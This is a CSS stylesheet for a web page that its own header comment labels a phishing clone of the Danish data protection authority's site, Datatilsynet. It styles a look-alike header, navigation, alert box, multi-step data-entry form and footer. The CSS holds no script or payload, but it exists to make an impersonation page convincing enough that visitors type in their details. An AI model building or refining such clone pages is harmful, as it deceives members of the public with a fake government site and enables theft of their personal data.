/* ============================================
   Datatilsynet Phishing - Exact Design Clone
   Matches datatilsynet.dk 100%
   ============================================ */

*, *::before, *::after { box-sizing: border-box; }
html { font-size: 16px; }
body {
    margin: 0; padding: 0;
    font-family: Arial, sans-serif;
    font-size: 16px; font-weight: 400; line-height: 1.5;
    color: #222; background: #15273f;
}
a { color: #15273f; text-decoration: none; }
a:hover { text-decoration: underline; }
img { max-width: 100%; height: auto; }
.overflow { background: #fff; min-height: 100vh; }

/* HEADER */
.header { background: #fff; width: 100%; }
.header-container {
    max-width: 1280px; margin: 0 auto; padding: 18px 0;
    display: flex; align-items: center; justify-content: space-between;
}
.logo img { max-width: 300px; display: block; }
.service-menu { display: flex; align-items: center; }
.service-menu ul {
    list-style: none; margin: 0; padding: 0; display: flex; align-items: center;
}
.service-menu ul li { margin: 0 0 0 24px; }
.service-menu ul li:first-child { margin-left: 0; }
.service-menu ul li a { font-size: 14px; color: #15273f; display: inline-block; }
.search-btn {
    background: #15273f; color: #fff; border: none;
    width: 37px; height: 37px; border-radius: 50%;
    display: flex; align-items: center; justify-content: center;
    cursor: pointer; margin-left: 24px; flex-shrink: 0;
}

/* MAIN NAV */
.main { width: 100%; }
.main .bg { background: #f3ecdd; }
.main .cnt { max-width: 1280px; margin: 0 auto; }
#main-menu { list-style: none; margin: 0; padding: 0; display: flex; }
#main-menu > li { margin-right: 48px; }
#main-menu > li:last-child { margin-right: 0; }
#main-menu > li > a {
    font-size: 14px; font-weight: 700; color: #15273f;
    padding: 19px 0 16px; display: flex;
}

/* HERO */
.hero {
    width: 100%; min-height: 410px;
    background-size: cover; background-position: center;
    display: flex; align-items: center;
}
.hero .wrap { max-width: 1280px; margin: 0 auto; padding: 0; width: 100%; }
.hero .wrap .box {
    background: #fff; padding: 32px; max-width: 640px;
}
.hero .wrap .box h2 {
    font-size: 24px; font-weight: 700; color: #15273f;
    margin: 0 0 16px; line-height: 1.3;
}
.hero .wrap .box p { margin: 0; color: #222; font-size: 16px; }

/* FORM */
.form-section { background: #f9fdfb; padding: 48px 0; }
.container { max-width: 1280px; margin: 0 auto; padding: 0; }
.row { display: flex; flex-wrap: wrap; margin: 0 -16px; }
.span-12 { width: 100%; padding: 0 16px; }
.span-4 { width: 33.333%; padding: 0 16px; }
.span-3 { width: 25%; padding: 0 16px; }

.form-card {
    max-width: 640px; margin: 0 auto;
    background: #fff; box-shadow: 0 2px 12px rgba(0,0,0,0.08);
    padding: 40px 48px;
}
.form-card h1 {
    font-size: 28px; font-weight: 700; color: #15273f;
    margin: 0 0 8px; text-align: center;
}
.form-card .sub { font-size: 16px; color: #555; margin: 0 0 24px; text-align: center; }

.alert {
    background: #fdf8ed; border-left: 4px solid #9d7935;
    padding: 14px 18px; margin-bottom: 24px;
    font-size: 14px; color: #333; line-height: 1.5;
}
.alert strong { color: #9d7935; }

.form-group { margin-bottom: 18px; }
.form-group label {
    display: block; font-size: 14px; font-weight: 600;
    color: #333; margin-bottom: 6px;
}
.form-group label .req { color: #c00; }
.form-control {
    width: 100%; padding: 12px 14px; font-size: 16px;
    font-family: Arial, sans-serif; color: #222;
    background: #fff; border: 1px solid #ccc;
    outline: none; transition: border-color 0.2s;
}
.form-control:focus { border-color: #15273f; }
.form-control::placeholder { color: #999; }
.form-row { display: flex; gap: 16px; }
.form-row .form-group { flex: 1; }

.btn {
    display: inline-flex; align-items: center; justify-content: center;
    padding: 14px 20px; font-size: 16px; font-weight: 600;
    font-family: Arial, sans-serif; border: none;
    cursor: pointer; width: 100%;
    background: #15273f; color: #fff;
    transition: background 0.2s;
}
.btn:hover { background: #1e3a5f; }
.btn:disabled { opacity: 0.6; cursor: not-allowed; }
.btn .load { display: none; align-items: center; gap: 8px; }
.btn .load .sp {
    width: 18px; height: 18px; border: 2px solid rgba(255,255,255,0.3);
    border-top-color: #fff; border-radius: 50%;
    animation: spin 0.8s linear infinite;
}
@keyframes spin { to { transform: rotate(360deg); } }

/* STEPS */
.step-indicator {
    display: flex; align-items: center; justify-content: center;
    margin-bottom: 28px; padding-bottom: 20px;
    border-bottom: 1px solid #eee;
}
.step { display: flex; flex-direction: column; align-items: center; gap: 6px; }
.step-num {
    width: 32px; height: 32px; border-radius: 50%;
    background: #e0e0e0; color: #888;
    display: flex; align-items: center; justify-content: center;
    font-size: 14px; font-weight: 700;
}
.step.active .step-num { background: #15273f; color: #fff; }
.step.done .step-num { background: #2e7d32; color: #fff; }
.step-label { font-size: 12px; color: #888; }
.step.active .step-label { color: #15273f; font-weight: 600; }
.step.done .step-label { color: #2e7d32; font-weight: 600; }
.step-line {
    width: 60px; height: 2px; background: #e0e0e0;
    margin: 0 12px; margin-bottom: 24px;
}
.step.done + .step-line { background: #2e7d32; }
.hidden { display: none; }

/* INFO */
.info-section { background: #fff; padding: 48px 0; }
.info-card { background: #f5f5f4; padding: 24px 32px 32px; height: 100%; }
.info-card h3 { font-size: 18px; font-weight: 700; color: #15273f; margin: 0 0 12px; }
.info-card p { font-size: 16px; color: #222; margin: 0 0 16px; line-height: 1.6; }
.link-arrow {
    display: inline-flex; align-items: center; color: #15273f;
    font-size: 16px; padding-left: 14px; position: relative;
}
.link-arrow::before { content: '\2192'; position: absolute; left: 0; color: #15273f; }

/* FOOTER */
footer { background: #15273f; color: #fff; }
footer .inner { background: #15273f; padding: 32px 0; }
footer .container { max-width: 1280px; margin: 0 auto; }
footer .row { display: flex; flex-wrap: wrap; margin: 0 -16px; }
footer .span-3 { width: 25%; padding: 0 16px; }
footer .card { margin: 16px 0; }
footer .heading { font-size: 20px; font-weight: 700; color: #fff; margin: 0 0 13px; }
footer p { font-size: 16px; color: #fff; margin: 0 0 20px; line-height: 1.6; }
footer a { color: #fff; }
footer .items { list-style: none; margin: 0 0 16px; padding: 0; }
footer .item { padding: 4px 0; }
footer .item a { color: #fff; font-size: 16px; display: block; padding-left: 16px; }

/* RESPONSIVE */
@media (max-width: 1023px) {
    .logo img { max-width: 260px; }
    .header-container { flex-direction: column; align-items: flex-start; padding: 12px 20px; }
    .services { width: 100%; margin-top: 12px; }
    .service-menu ul { flex-wrap: wrap; gap: 8px; }
    .service-menu ul li { margin-left: 0; }
    #main-menu { flex-wrap: wrap; padding: 0 20px; }
    #main-menu > li { margin-right: 24px; }
    .hero .wrap .box { max-width: 100%; margin: 0 20px; }
    .form-card { padding: 24px 20px; margin: 0 16px; }
    .span-4, .span-3 { width: 100%; }
    .step-line { width: 30px; }
    footer .span-3 { width: 50%; }
    .form-row { flex-direction: column; gap: 0; }
}
@media (max-width: 480px) {
    .form-card h1 { font-size: 22px; }
    .step-line { width: 20px; }
    footer .span-3 { width: 100%; }
}
